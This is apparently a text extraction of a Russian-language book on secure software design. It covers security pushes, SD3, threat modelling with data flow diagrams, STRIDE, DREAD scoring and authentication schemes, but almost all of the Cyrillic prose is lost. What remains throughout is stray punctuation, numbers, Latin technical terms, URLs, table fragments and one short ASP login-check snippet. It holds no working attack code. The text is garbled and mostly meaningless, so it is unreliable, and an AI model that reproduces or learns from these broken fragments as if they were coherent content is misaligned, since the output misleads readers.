, ;
;
;
,
, Authenticode;
Web;
,
;
PR,
;
(ISP);
,
, ,
;
.
,
. ,
, , ,
;
, , ,
.
,
, .
!
,
Microsoft (Microsoft Security Response Center) ,
, ,
100 000 .
,
(Computer Crime and
Intellectual Property Section, CCIPS) Web (http://
www.cybercrime.gov).
10
, , ,
.
, ,
.
.
,
. .
,
. .
,
. , , ,
, .
, :
;
;
(script) ,
;
(
, ?);
,
;
,
,
.
(regression bug)?
; , .
, .
, ,
, . ,
.
. ,
.
Perl, .
: ,
, . ,
, . .
TCP (Transmission Control
Protocol), Perl:
, ,
. ,
, .
11
5.
,
,
. :
(own),
?
(own)?
. , 0wn3d (owned
). , !
. , 3
e (,
E), 0 O . ,
, (rooted)
(root).
(superuser), Unix root.
Administrator () SYSTEM Microsoft Win
dows NT/2000/XP .
, .
; , , .
, ,
, , , ,
. ,
.
! ,
. .
,
, .
, ,
, . , ,
,
.
,
, ,
12
. ,
.
,
.
, ,
. , ,
(Jim Allchin), Windows Microsoft.
, Windows:
, , Windows XP
. ,
,
. , Microsoft
.
,
.
Windows XP
.
, .
, ,
,
.
,
,
. , Windows
XP ,
.
.
: .
, . ,
, .
, Windows XP
13
, . :
,
.
Microsoft 2002 ,
(Trustworthy Computing),
.
,
. Web
news.com.com/20091001817210.html.
, , ,
.
, .
:
;
;
, ;
. :
, ,
;
, .
, .
: NTBugTraq BugTraq. Windows NT,
. NTBugTraq
(Russ Cooper), http://
www.ntbugtraq.com. BugTraq, ,
,
SecurityFocus, Symantec Corporation.
http://www.securityfocus.com,
20 .
NTBugTraq BugTraq
.
SecurityFocus (http://
www.securityfocus.com), VulnDev, PenTest SecProg.
14
.
:
, . , ,
,
.
Microsoft , ,
, :
. , ;
. ,
, ,
, , , ,
, ,
;
,
;
( )
;
, .
;
;
.
, . , ,
, .
,
, .
. ,
,
.
, ,
.
, ,
. ,
.
, ,
: , .
,
.
.
.
.
15
, , . (,
, : , ,
.)
, ,
. ,
.
2000 ,
. ,
, .
, ,
. , (
) .
, .
, .
,
. ,
, , ,
, ,
: ,
. :
. : ,
. , Windows (Secure Win
dows Initiative) Microsoft :
, .
;
(white paper),
.
;
: ,
, ,
.
.
,
.
;
. Web ,
, ,
, .
16
,
;
, ,
.
. ,
strcpy
, ,
.
.
: .
, ,
, ,
.
.
.
, ,
.
, , , .
, , , ,
.
, ,
, . ,
24 , 7
. ,
, ,
. ,
.
,
.
.
17
1:
,
, :
5 * , , .
, ,
, .
,
, , .
, .
:
, .
,
, .
2:
,
, , .
, ,
? ?
.
. , IIS 5 ,
(escape character) URL,
UTF8
. , ,
.
Web http://www.wiretrip.net/rfp/p/doc.asp/i2/
d57.htm.
, .
, ,
, .
3: ,
.
. ,
. , , ,
.
. . .
18
, ,
, . ,
, .
4:
,
, .
,
(, ,
, ) .
.
.
, , .
,
, .
, ,
. , ,
,
. ,
, !
(George Mallory) (18861924), :
? : , .
,
, ,
.
, , ,
. (
)
. ,
. ,
.
, ,
.
, : ,
, .
, , ,
.
,
.
,
, , ,
.
,
.
, :
;
,
;
;
20
;
.
.
, , ,
; ,
, , .
, , ,
, .
,
.
, . ,
, (usability)
,
. , ,
!
: ,
? ,
? : ,
.
,
. ,
, ,
. ,
,
( ). ,
, A B,
, , A 15% B.
,
, , ,
. . , ,
,
,
. :
. 3 19.
: ,
, .
, ,
, , ,
.
:
21
, .
, .
(
) .
.
. 21 ,
.
, (waterfall approach),
,
. .
. 21.
, . ,
.
. ,
. .
22
, ; ,
.
2002 ., Microsoft
Windows (Windows Security Push).
8500 . , ,
! , ,
, Windows (
70), , !
, 56 .
, ,
. ( Microsoft
.)
, . ,
, !
? .
. , , :
, , .
. ,
, ,
. , , ,
. :
, .
, , . 2002 .
Windows Security Push
(Network and
Distributed System Security Symposium, NDSS) ,
.
, .
Secure Windows Initiative,
. ,
RSA (RivestShamirAdleman), .
,
P Q..., , ,
RSA, . : ,
RSA ( , ,
, , ),
. , ,
; .
, , , : RSA
, , ,
, , .
RSA
23
. ,
, , +
. , ,
, :
.
,
,
.
, , .
, , , ,
. , .
: ,
,
. , ,
,
?
: ,
.
! : =
.
,
, RSA .
: RSA ,
. ,
;
,
. ,
, RSA .
!
Windows Security Push. ,
,
. , , Kerberos, DES (Data Encryption
Standard) RSA, ,
, C++! :
, , ,
, .
8500 .
: , ,
,
. : , , ,
. (
, ) .
( Microsoft).
24
. ,
!
,
. ,
:
,
,
.
,
, .
.
! ,
. , , ,
, ,
; ,
, . ,
,
.
,
, ! ?
,
.
, , .
, .
,
.
,
, ,
. .
:
IIS 6
, . , , ,
. ,
, ? ;
,
. ,
, . !
25
, ,
,
.
. ,
: ,
. ,
.
, .
, (
Windows, ,
, HTTP, XML .) ,
(. 22).
. 22.
, :
, ,
,
.
,
, ,
.
26
! . ,
,
,
.
!
,
, ,
. ! ,
, , .
.
, .
,
, :
: ,
.
: .
: ?
: 10 000 ,
.
:
?
?
: ? 10 000 10 000 !
, , ,
,
. ,
.
,
.
!
2001 . ,
. :
.
1000 ,
C .
10 , 16.
,
, , ,
. ,
27
. , 45, 41 .
, 54 . ,
55 , . . , , 57,
!
,
, ,
?
!
, .
, ,
, , .
,
Microsoft. ,
. ,
, , , ,
,
. .
!
;
.
. ,
, ,
10 , ,
, 10
..
.
, :
,
. :
. , .
, .
;
. ,
,
.
,
. ,
28
,
.
, . ,
, .
5.
:
,
.
.
, GPS.
:
;
;
;
, ,
;
( ) ?
? ?
, , ,
.
. ,
,
.
,
, .
.
,
, ,
.
,
. ,
,
, .
, !
.
.
, ,
,
29
. , ?
, ,
. , ,
. Microsoft
,
.
(. 23) .
,
, ,
.
!
?
-
Fortune 1000
?
.
,
, Web-
?
! - ,
Web-
. ,
-
.
?
,
100 . -
(script kiddies), "" Web-
(DOS-); ;
,
,
.
, .
?
,
. ,
.
,
.
. 23.
30
,
. :
,
? , ,
.
.
?
?
?
?
: ? ,
? ?
?
?
?
?
?
ISO 17799 Information Technology Code of practice for information security mana
gement (
) ,
, ,
, 10.1.1 10.1 Security
requirements of systems ( ):
,
.
ISO 17799 ,
,
. www.iso.ch.
, ,
ISO 17799, ,
9.6 Application access control (
), 10.2 Security in application systems (
) 10.3 Crypto
graphic controls ( ).
31
, . ,
.
, ,
.
. ,
,
.
www.ietf.org;
RFC, IETF ,
, .
:
. :
Microsoft Clip Art Gallery,
(www.microsoft.com/technet/security/bulletin/MS00015.asp);
ufsrestore, Solaris,
root
(online.securityfocus.com/advisories/3621);
sort UNIX, Apple OS X,
DOS (www.kb.cert.org/vuls/id/
417216).
? ,
,
.
, .
,
.
:
(The Net),
(Sneakers) (Hackers)!
,
:
0: ;
1: ;
2: ;
3: ;
4: ;
5: .
,
? ,
,
32
. ,
.
, , 3,
, 1 2.
, , 3,
.
: ,
0 , ,
.
,
, 3.
, .
: ,
, ,
, ,
.
, , ,
:
,
;
, ,
;
. ;
, .
!
(
, ),
. , ,
.
,
,
,
, .
, ,
.
, , ,
, .
01.09.2002
08.09.2002
1:
22.10.2002
30.10.2002
,
1 ,
Secure Windows
18.11.2002
2:
15.12.2002
10.01.2003
, ,
1:
06.11.2002
27.11.2002
2:
02.02.2003
24.02.2003
2 ,
Secure Windows
28.02.2003
07.03.2003
:
(Release)
03.04.2003
25.05.2003
33
3:
01.06.2003
4
01.07.2003
3 ,
Secure Windows
14.08.2003
:
(Release)
30.08.2003
21.09.2003
(Release
Candidate)
30.09.2003
30.10.2003
, 4 ,
Secure Windows
!
,
.
.
, , ,
. ,
. , ,
:
, .
34
,
.
.
, ,
, ,
, , .
, ,
.
, / .
, .
,
, ,
, .
,
, , .
,
, .
DOS: ,
.
,
4, ,
. ,
, . :
. .
,
.
, .
, ,
,
.
. ,
, . ,
. , ,
, .
35
, ,
. ,
, .
. , ,
, .
, ,
, ,
,
(), , ,
, , ,
.
, ,
(, ,
, ).
, ,
,
. , ,
. , ,
, .
Microsoft
, ,
A1 Orange Book. (
, A1 .
http://www.dynamoo.com/orange.) ,
, ,
,
,
.
, .
, , 10
50 000 ,
, ,
? ,
; ,
.
( ),
,
. ,
!
,
. ,
36
, , ,
, , .
.
, , ,
. ,
. : ,
, , , 3,
.
, .
, ,
.
! , ,
, .
: ,
4.
,
, ,
.
, . Microsoft
.
.
.
: .
?
:
(checkin) .
, .
.
,
. , ,
, :
. ,
37
, , ,
, . (Hawthorn
effect) , *.
,
, ,
.
. ,
HTML XML
, .
(code diffs),
. ,
Perl, Windows.
.
windiff.exe** , , .
,
. :
.
, , ,
,
, .
: ,
, . . ,
, ,
, .
,
,
.
, , 3.
, ,
.
.
(George Elton
Mayo, 18801949) ,
.
. ,
, . . .
**
. . .
38
, ,
. Microsoft,
,
,
. ,
, ,
.
, , .
,
, .
2001 . Microsoft
security push. :
;
,
;
;
.
.
security push ( Windows 8 ),
, .
. , ,
, ,
. , security push
, ,
,
. ( , ,
security push ,
, , ,
!)
,
, :
,
. , ,
, , ,
, , ,
. ,
39
,
. 4;
.
; ;
,
.
;
,
,
. :
, .
,
( )! , ;
,
. . !
, ,
, . :
, 5 ,
, 3 ,
.
,
. , ,
.
:
.
, , .
, ,
.
4 STRIDE,
, , , , DS.
!
, ,
, .
,
? ,
, .
. , ,
, , , !
40
, .
,
, ,
, .
. ! ,
.
,
; ,
, .
, ,
. ,
,
19.
, , , ,
. ?
, ? ,
: , ?
,
, ,
,
. , ,
; .
X, ,
. ,
, . ,
, ,
.
, , readme,
, . , ,
readme .
,
readme
.
! , ,
!
41
, .
.
,
, ,
. ,
.
, , ,
.
, , ,
.
, , ,
. :
Acknowledgment Policy for Microsoft Security (
Microsoft) (www.micro
soft.com/technet/security/bulletin/policy.asp), RFPolicy (
) (www.wiretrip.net/rfp/policy.html) Responsible Vulnerability
Disclosure Process ( ) (Christey)
(Wysopal) (http://www.ietf.org).
,
, Common Methodology for Information Technology
Security Evaluation (
) (www.commoncriteria.org/docs/ALC_FLR/alc_flr.html).
, .
. , . ,
, .
.
? ! ,
, .
: ?
! ,
.
.
, ,
. , ,
.
42
, ,
. .
.
.
,
,
, .
!
, !
.
3
,
.
,
. ,
,
.
, :
,
. .
SD3: ,
Windows (Secure Windows Initiative),
, :
,
( : secure by design, by
default and in deployment SD3). ,
.
44
,
. ,
.
, .
, ,
,
, ,
, .
(
2).
,
. 4,
, ,
.
. , .
, .
,
. : ,
. , , .
.
,
.
. (
). ,
, ,
,
.
. ,
, .
,
. ,
, ,
, , ,
,
.
(code rot).
(penetration analysis).
,
. ,
.
45
.
(hackfests),
.
,
(denial of service attack, DS
)
.
,
.
.
:
, ,
.
.
,
, Administrators () Domain
Administrators ( ), .
,
7, .
.
( 6).
, .
,
,
.
, .
.
, ,
,
. ,
(patch) .
. ,
, !
,
.
, .
: ,
( 24) !
46
SD 3. :
. ,
, ; ,
, .
, , ,
,
. , ? :
;
, ;
;
;
;
, ;
;
;
,
;
, ,
;
,
( , ,
, );
;
.
, ,
, ,
.
, ,
,
. .
.
.
(Norman Cousins) (19151990),
.
(George Santayana) (18631952),
47
.
(Archibald McLeish)
(18921982),
,
. .
?
?
?
?
?
, . ,
,
, ,
.
.
Microsoft ,
,
Microsoft (Microsoft Security Response Center) www.microsoft.com/security.
,
, .
:
;
;
;
;
;
;
;
, ,
;
, , ,
(code diffs)* .
, ,
.
: ,
.
.
, .
. . .
48
, ,
( , ).
,
: ? ,
, .
. 100
.
, ,
, .
, ,
.
.
, .
,
.
, ,
. 20 .
. ,
,
. ,
,
!
,
,
,
. ,
.
19
, , :
(TCP UDP);
(named pipes);
(RPC endpoints);
;
, ;
, ;
ISAPI;
Web;
49
;
,
(Access Control List, ACL).
,
,
. , ,
SYSTEM, !
Microsoft
, :
.
, ,
.
,
.
, , ,
. , ,
, .
.
, 80/20: 20% ,
80% .
20% , 80% ,
. (
. , , :
DWORD, 28 ,
!). , ,
.
, :
, .
: ,
, , ,
.
.
.
,
.
,
. 20 ,
, : ,
, .
50
? .
, .
, :
, ,
,
? :
, ,
?
: , , !
. , : !
, ,
?
, !
,
, : .
, ,
, .
! ,
,
.
. ,
,
.
: ,
,
. . ,
, ,
.
? ,
, XVI ,
. ,
: ,
. .
, .
,
, . * .
.
,
, : , .
. .
51
.
, ?
, ,
:
;
,
. , .
,
. ,
. ,
, ;
;
,
;
,
( ,
);
:
;
;
.
,
,
. .
,
. :
.
, . ,
,
. , , .
, ,
?
(single point of failure),
.
! ,
. !
,
, , .
,
52
, , , , ,
,
. .
,
, , .
,
.
.
, :
? .
, .
, ,
,
. ,
? ( , , ,
,
.)
:
,
, runas,
Run as different user
( ) ( Windows 2000) Run with
different credentials ( ) ( Windows
XP).
.
. ,
.
!
,
, .
, ,
.
,
. , ,
, , ,
. ,
, .
, .
.
, . ,
,
53
, , .
.
,
, ,
.
7 ,
.
, ,
, . ,
.
:
, ,
,
.
.
2002 . 2.3.1 3.3 OpenSSH,
Apple Mac OS X, FreeBSD OpenBSD,
.
, UsePrivilegeSeparation
ssbd_config. Web www.open
ssh.com/txt/preauth.adv.
Microsoft IIS 6,
Windows .NET Server. IIS 5, Web
.
HTTP (w3wp.exe),
(Network Service),
(Local System). inietinfo.exe,
,
HTTP, .
Web Apache.
httpd root;
httpd,
nobody.
. , ,
, ,
, ,
.
54
.
:
,
. ,
, 1
2. , !
.
,
.
,
,
.
: SMB TCP/IP
Microsoft.
SMB (Server Message Block)
Microsoft LAN
Manager, 80. , SMB
, , Win
dows NT 4 Service Pack 3 Windows 98.
: (man
inthemiddle) ,
, .
,
,
. SMB ,
, , .
SMB
.
SMB ,
. :
.
:
SMB.
TCP/IP. IPSec (Internet Protocol Security)
TCP/IP ,
( ). TCP/IP ,
.
55
,
:
. ,
, ,
, .
, .
, .
.
. 15 :
DNS, ,
. , ,
.
,
, ,
Web .
,
. ,
.
! , , , ,
.
.
, !
, .
, (bugs).
, .
. , ? ,
Web? ?
, , .
: ,
, , .
: ,
. .
, , ?
: .
,
56
.
( ).
, ,
,
.
,
. ,
, ,
, Windows.
,
.
57
, .
, ,
.
(Jerome Saltzer)
(Michael Schroeder) The Protec
tion of Information in Computer Systems (
) (web.mit.edu/Saltzer/www/publications/protection).
:
, , .
,
,
:
!=
Secure Windows Initiative.
,
. ,
,
. SSL (Secure Socket Layer)
TLS (Transport Layer Security),
. ( ,
,
).
,
, ,
.
. ( ,
, ).
,
.
, , ,
.
, ,
.
.
,
. ,
.
58
, 2.0
Lotus 123 1985 .
80 90;
.
:
. .
, , .
,
, (
), ( ).
Web, URL
(crosssite scripting), HTML
JavaScript. ,
, .
,
. Microsoft
Office XP.
.
,
. , :
. , : , ,
, , , . . , ,
. ,
.
,
.
: , ,
, , .
,
. , ,
, ! ,
.
!
,
(patched) . :
59
, .
,
(40104 ..)
, ,
. , ProcessData,
. ,
. ProcessData
, ,
.
,
, .
, .
, , .
.
, ,
. . , ,
,
(
).
.
,
!
! , ,
. .
, ,
.
(threat model), .
,
, ,
.
.
, .
, , ,
, , .
Windows Security Push 2002 ,
,
, ,
,
, (
9), . ,
Windows Security Push ( Microsoft)
, , ,
.
61
, , ,
, ,
, .
,
, .
, !
.
. .
, , ,
!
:
, , !
. ,
,
,
.
. ,
.
. ,
,
.
! ,
, ,
!
,
.
, ,
.
. , ,
.
,
.
, ,
A, B, , A
. ,
A. , , ,
, ,
.
:
.
62
19.
,
.
, .
:
.
:
1. ;
2. ;
3. , ;
4. ;
5. ;
6. ;
7. .
(. 41)
: .
, ,
.
. 41.
.
.
.
, ,
. ,
63
, ,
.
,
, ,
, . ,
. ,
,
. ,
: ,
. ,
, .
,
, . (
,
, !)
,
, ,
, .
.
, Microsoft,
.
,
.
!
. ,
. ,
, !
,
, , .
,
.
: ,
, ,
. , ,
.
, . ,
Microsoft, 2001 ., ,
64
.
, ,
, .
2002 ., Microsoft @stake (http://www.atstake.com),
,
, Microsoft. ,
@stake,
, .
Microsoft SQL Server
, ,
. , SQL Server
. SQL Server ,
(data flow diagrams, DFD). ,
, DFD,
.
DFD,
. ,
,
.
, DFD
. ,
, DFD
. UML (Unified Modeling Language),
(activity diagram),
DFD. UML
,
, DFD. , .
DFD
UML.
.
DFD :
, , ,
. DFD
.
DFD (. 42).
,
. DFD
.
, ,
. :
65
.
: .
0, 1, 2 . . (. 43).
,
, ..
. 42.
DFD
DFD,
Web .
. 44
.
DFD
:
.
, , ,
;
, .
, Web ,
;
, . Web
, , ,
;
66
. 43. DFD
DFD
.
, (, ,
. .) ( );
.
. 44
. . 45
1 .
3.0
67
;
0.0
1.0
2.0
Web-
4.0
. 44.
DFD
DFD, :
;
;
;
;
(: ,
, );
(
: , , );
(:
, );
68
2.0
14.0
12.0
6.0
9.0
5.0
11.0
1.0
7.0
Web-
13.0
8.0
Web-
3.0
Web-
. 45.
4.0
DFD 1
(:
, , ).
, ,
. ,
, . 8 DFD,
,
. ,
,
, DFD!
69
,
DFD 1.
!
, .
, ,
.
. 46
(, , ).
Web
Web-
Web-
Web-
Web-
Web-
. 46.
70
. 41.
4-1.
.
,
5
.
: Web Web.
:
,
. :
,
Web
Web, Web
Web
HTML
Web
,
,
Web
,
Web, Web
Web
HTTP
Web
Web
: WWW
,
.
Web
Web
Web. Web
,
.
,
4-1.
71
()
.
,
,
. , ,
,
.
(threat target). , ,
, . ,
.
: STRIDE
,
:
, ;
;
;
?
.
, STRIDE
.
(Spoofing identity)
.
(
) .
,
HTTP: (Basic authentication)
(Digest authentication). RFC 2617. ,
HTTP
(Blake), (Fletcher)
72
,
.
DNS (DNS spoofing)
DNS (DNS cache poisoning). :
Apple.
DNS, Web news.com.com/
21001001942265.html, DNS.
(Tampering with data)
. :
( ),
, (
, ).
, ACL [, Every
one: Full Control (: )].
(Repudiation)
( ), ,
. , , ,
, .
(nonrepudiation)
. ,
.
,
. ,
.
(Information disclosure)
, ,
, ,
. , ,
:
, .
(Denial of service)
,
Web .
DoS
.
(distributed denial of service,
DDoS), Trinoo Stacheldraht. Web
staff.washington.edu/dittrich/misc/ddos/.
DoS ,
, .
:
(Cheryl) Web,
(Lynn) ,
73
. Web
,
, .
(Elevation of privilege)
,
.
,
. . :
,
,
. ,
.
, . STRIDE
.
. ,
.
, .
STRIDE DREAD (
) , Microsoft
, (Lohen Kohnelder), (Praerit
Garg), (Jason Garms) .
, .
,
. , ,
:
root ,
.
, ,
. , SMTP,
,
.
!
, , .
(threat trees)
STRIDE.
,
OCTAVE (Opera
tionally Critical Threat, Asset, and Vulnerability Evaluation) (http://www.cer
t.org/octave).
74
(fault trees). ,
.
( ),
.
. (Edward Amoroso)
Fundamentals of Computer Security Technology (
) . .
, , ,
,
, ,
.
, .
, ( )
(asset).
(threat target).
(
),
. :
, .
.
?
!
, .
, .
.
, . ,
.
, , .
, ,
, .
,
.
, .
, ,
.
.
: ,
,
.
75
.
, , .
,
.
. DFD .
, Web
(, ) (. 47).
1.0
5.0
. 47. DFD 1,
Web
, ()
,
,
.
. .
:
, , (sniffer)
, (promiscuous mode),
,
Web* . ,
, .
. 48 , ,
.
,
.
, ,
. . .
76
. ,
( ),
. ,
, , (promis
cuous mode). , ,
.
1
(I)
Component
1.1
HTTP-
1.2.1
1.2
1.2.2
1.2.3
1.2.2.1
1.2.2.1
1.2.2.2
1.2.3.1
. 48.
,
, .
[ (I)],
. :
,
. (1.0)
(5.0).
77
!
.
: , HTTP
(1.1),
, (1.2.1) ,
(1.2.2) (1.2.3).
( HTTP),
1.2.1 1.2.2. ,
. :
:
( 1.2.2.1 1.2.2.2),
(1.2.2.3).
(
).
, .
,
.
. ,
. 48.
1.0
1.1 HTTP! ()
1.2
1.2.1
1.2.2 ,
1.2.2.1 ()
1.2.2.2
1.2.2.3
1.2.3
1.2.3.1
,
. ,
, .
, ,
, (. 49).
,
. .
, .
:
. . 411 , 3.2 ,
3.2.1 3.2.2 .
78
, ()
. .
(I)
(S) (E)
1.1
SSL/TLS
1.2
1.3
1.3.1
,
1.2
. 49.
,
(. 42).
4-2. ,
,
.
,
, . ,
(1.05.0)
(14.0)
STRIDE.
STRIDE
4-2.
79
()
.
,
( )
.
, ,
. ,
.
.
.
. : ,
, ,
( )
,
. ,
. ,
,
.
!
, , .
,
, , .
,
.
( RiskCO)
( ) ,
. 1 10:
DREAD
,
Microsoft, DREAD ( RiskDREAD)
.
(Damage potential)
. (10)
80
. 10.
.
, .
(Reproducibility)
. ( 10),
, ,
, .
. .
(Exploitability) ,
. ,
, (10).
100 000 000 ,
1. : , [ ,
(script kiddies)],
10 .
. ,
,
10 . ,
, .
, (Affected users)
, .
: 100%
10, 10% 1 . ,
. ,
.
: , ,
, , .
, .
, ,
. 100 .
.
(Discoverability)
. , ,
, 10 ,
.
DREAD (
5).
, .
, :
1:
8
10
: 100%
81
10
: ,
10
: ,
RiskDREAD: (8 + 10 + 7 + 10 + 10) / 5 = 9
9 10 ,
, ,
.
! , ,
. : ,
, ! !
, ,
, .
, (Christopher W. Klaus)
Internet Security Systems, ,
. ,
:
: ?
, ? ,
;
? ,
? ?
;
? , ,
, ,
.
.
: , ,
STRIDE DREAD
, .
, STRIDE
, ,
, , ,
, , DREAD.
STRIDE .
:
;
;
,
;
;
82
;
, ?
,
.
DFD
. ,
, .
:
, .
.
Windows Security Push ,
,
. ,
,
.
, , ,
. ,
,
. , , .
,
, , , .
, ,
.
? , , 30
?
? .
, ?
? ,
?
? , ?
? , ?
, ,
. , ,
5 , , , ,
5 ,
15 , 10
.
. , ,
.
,
. ,
.
83
, DFD
(. 43).
4-3. DFD-
STRIDE
.
( ,
), ( ,
) .
.
(reverse engineering)
.
.
,
.
,
, .
,
.
,
.
, ,
.
.
,
,
,
.
(. 44 49) ,
. . 48 . 410 414 (
84
) ,
. 44 49.
4-4.
(5.0 1.0)
: 9
: 10
: 7
: 10
: 10
: 9
,
.
, ,
, .
,
, ,
, .
, Why your switched network isnt
secure ( )
http://www.sans.org
4-5.
Web-
: 7
: 7
: 7
: 10
: 10
: 8,2
4-6.
.
Web
. (
)
: 6
4-6.
85
()
: 6
: 7
: 9
: 10
: 7,6
DoS,
Web
, .
,
.
3.3:
(Cartesian join).
, SQL. ,
,
,
650 000 , 113 000, 75 100,
5 165 095 000 000 000
.
3.4:
.
,
(11.0), ,
,
.
, ,
(, DoS),
4-7.
(12.0)
: 10
: 5
: 5
: 10
: 10
: 8
4.3
(2.0)
,
(12.0). DFD (. 45),
86
4-8.
(5.0)
: 10
: 2
: 2
: 1
: 10
: 5
Web, .
, ,
Web,
Local System.
,
Web.
,
. ,
,
4-9.
(5.0)
: 10
: 2
: 2
: 8
: 10
: 6,4
: (
)
[ DNS (flood) ]
87
2
Web-
2.1
2.2
2.1.2
2.2.1
e
-
. 410.
2.3
Web-
,
2.4
Web
2.4.1
2
3
3.1
3.2
3.3
er
3.4
3.2.1
3.2.2
. 411.
88
4.1
,
4.2
4.3
4.2.1
4.2.2
4.3.1
4.3.2
(. 1)
SSL
. 412.
4
5
Web-
5.1
,
. 413.
5.2
5.2.1
Web-
5.2.2
,
Web-
89
6
Web-
6.1
,
Web-()
6.2.1
DNS
6.2
6.2.2
IP-
6.2.3.1
. 414.
6.2.3
6.2.3.2
6.2.4
6.2.4.1
er
,
?
(
, ). . 410. ,
2.3 , , ,
.
, ?
, : ,
,
.
(zeroday attack) , ,
,
, exploit.
90
DREAD
.
! .
,
, ,
.
,
, .
1.
, DFD. DFD
,
, , .
2. STRIDE ,
. ;
.
3.
.
4.
DREAD .
5. .
,
.
:
;
;
;
, .
1:
,
,
.
,
. ,
.
: .
91
2:
, . Microsoft Internet Infor
mation Services (IIS) :
(basic authentication),
,
, ,
SSL/TLS.
1, :
, ,
. (
24.)
, , . ,
,
.
: ,
,
. ,
,
.
, ,
!
. ,
.
3:
,
. . ,
: .
, ,
. ,
:
, . ,
!
4:
: .
,
, ,
. ,
.
92
, ,
. .
, .
. , ,
. ,
, Kerberos
. . 410 ,
, STRIDE.
4-10. ( )
MAC
,
, . 410,
, .
, ,
93
(
).
,
.
, .
, ,
. ,
,
, .
, ,
(principal), ,
, , .
, .
(credentials),
, ,
( ).
Windows .
,
. Windows
:
;
;
;
Microsoft Passport;
Windows;
NTLM (NT LAN Manager);
Kerberos v5;
X.509;
IPSec (Internet Protocol Security);
RADIUS.
. ,
(Basic Authentication) , ,
Kerberos.
. , ,
, .
, ,
. . 411 ,
.
94
4-11.
Microsoft Passport
NTLM
Kerberos
X.509
IPSec
()
()
RADIUS
,
HTTP 1.0 (. RFC 2617 http://www.ietf.org/
rfc/rfc/rfc2617.txt). , Web Web
,
. Base64!
, :
,
,
SSL/TLS IPSec.
, , RFC 2617,
: ,
. , ,
HTTP, : LDAP,
IMAP (Internet Message Access Protocol), POP3 (Post Office
Protocol 3) SMTP (Simple Mail Transfer Protocol).
,
. , Microsoft ASP.NET
IHttpModule FormsAuthenticationModule.
.
Web,
. Web Web
( SSL/TLS),
. ,
, ASP.NET, XML.
ASP,
:
95
<%
Dim strUsername, strPwd As String
strUsername = Request.Form("Username")
strPwd = Request.Form("Pwd")
If IsValidCredentials(strUserName, strPwd) Then
' ! !
' ,
Else
' ! /
Response.Redirect "401.html"
End If
%>
.
.
Microsoft Passport
ssport ,
Microsoft. (
Microsoft Hotmail Microsoft Instant Messenger)
( 1800flowers.com, Victorias Secret, Wxpedia.com,
Costco Online, OfiiceMax.com, Office Depot 800.com).
, Passport, Web,
Passport, . Web
Passport
Passport Software Development Kit (SDK) c http://www.passport.com.
Passport ASP.NET PassportAuthen
ticationModule. Microsoft Windows .NET Server
LogonUser. , Internet Information Services 6
(IIS 6) Passport
, : ,
, Windows X.509.
Windows
Windows : NTLM
Kerberos. SSL/TLS,
. Windows
SSPI (Security Support Provider Interface).
SSP (Security Support Provider). Windows
SSP: NTLM, Kerberos, Schannel Negotiate. NTLM
, Kerberos 5, Schannel
SSL/TLS.
Negotiate ,
, , Windows 2000,
NTLM Kerberos.
, SSPI,
(Jeffrey Richter) (Jason Clark) Programming ServerSide Appli
cations for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .
96
NTLM-
NTLM Windows,
Windows CE. NTLM
Windows, , IIS,
Microsoft SQL Server Microsoft Exchange. NTLM. 2,
Windows NT SP 4,
1: (maninthemiddle).
, NTLM :
, .
Kerberos v5
Kerberos v5
(Massachusetts Institute of Technology, MIT) RFC 1510 (http://
www.ietf.org/rfc/rfc1510.txt). Windows 2000 Kerberos
Active Directory.
Kerberos ,
: . Kerberos ,
NTLM, .
Kerberos
(service principal
names, SPN) : Designing
Secure Webbased Applications for Microsoft Windows 2000 (Microsoft Press, 2000)
(. , . , . Web
Microsoft Windows 2000. . : ; .: , 2001).
X.509
X.509 SSL/TLS.
Web SSL/TLS HTTPS, HTTP,
SSL/TLS
. , ,
, .
, , ,
.
, SSL/TLS
. ,
SSL/TLS
. ,
X.509,
, .
,
. Windows 2000/XP
. Windows
.
97
X.509, ,
Designing Secure Webbased Applications for
Microsoft Windows 2000 (Microsoft Press, 2000) (. , . , .
Web Microsoft Windows 2000.
. : ; .: , 2001).
,
, (, Web,
LDAP) ,
, .
,
, NetBIOS \\Northwind, DNS http://www.
northwindtraders.com IP 172.30.121.14. .
DNS,
. , ,
.
IPSec
IPSec ,
. Kerberos
, IPSec
. IPSec
, :
( ). Windows 2000/XP
IPSec.
RADIUS
, Microsoft Internet Authentication Service (IAS),
RADIUS (Remote Administration DialIn User Service)
, RFC 2058.
Windows 2000
Active Directory.
, ,
. ,
. ,
.
Windows , :
(Access control lists, AL);
;
IP;
.
98
Windows NT/2000/XP ACL.
ACL (access control entries, ACE),
,
. , (Blake)
, (Cheryl) ,
.
ACL 6.
, ,
, ,
, .
.
7.
IP-
IP (IP restrictions) IIS,
Web (, )
Web, IP,
DNS.
. , Microsoft SQL Server ,
,
. , COM+, ,
,
. ,
.
, .
, , . ,
10 , ,
, 20.
, .
Windows
:
99
SSL/TLS;
IPSec;
DCOM RPC;
EFS.
SSL/TLS
SSL Netscape 90.
, ,
MAC (Message Authentication Code) . TLS
SSL, IETF (Internet Engineering Task Force).
IPSec
, IPSec ,
MAC .
IPS .
IPSec
, IPSec IP TCP/IP.
DCOM RPC
DCOM RPC ,
. ,
DCOM RPC .
16.
EFS
Windows, 2000, EFS (Encryp
ting File System) ,
NTFS. SSL, TLS, IPSec DCOM/RPC ,
EFS .
,
.
. ,
, !
, .
, 6.
, , MAC-
,
.
.
, , .
( )
, . 128
160 . ,
, .
100
, , ,
.
, . , .
, MAC .
MAC
,
( ). MAC
, .
MAC, , ,
, .
MAC,
; ,
, .
,
, ,
. ,
, , .
Windows API CryptoAPI (Crypto
graphic API) , ,
MAC .
,
8.
, (logging),
,
,
. Windows Windows, Web
IIS , SQL Server Exchange.
! .
,
, ,
.
,
(filtering)
.
101
,
, IP.
(throttling), ,
,
. ,
, .
.
(quality of service)
, .
, .
,
. 7 .
,
. 412 .
4-12. ,
STRIDE
SSL/TLS ( IPSec)
Web
Web
Web.
ACL,
Web
IP.
,
( ,
,
..). ,
TI
SSL/TLS DCOM/RPC
.
. SSL/TLS MAC
.
DCOM/RPC .
IPSec
. . .
102
4-12.
()
STRIDE
.
Web
SSL/TLS,
,
.
.
: Kerberos,
,
. .
! .
,
,
.
. 413 ,
,
. ,
.
,
.
.
4-13.
HTTP
TI
SSL/TLS, WTLS (
TLS)
IPSec
HTTP
.
IPSec
.
.
4-13.
103
()
RPC DCOM
TI
.
TI
Mail Extensions)
,
PIN
PIN
PIN!
, ,
IP.
IP
.
S, I
DoS,
,
,
.
,
15 .
cookie
cookie
Web
cookie
MAC
cookie
Web
. . .
104
4-13.
()
,
.
,
,
.
9
,
SSL/TLS,
IPSec Kerberos
HTML
Web
,
Web.
10
.
,
,
.
.
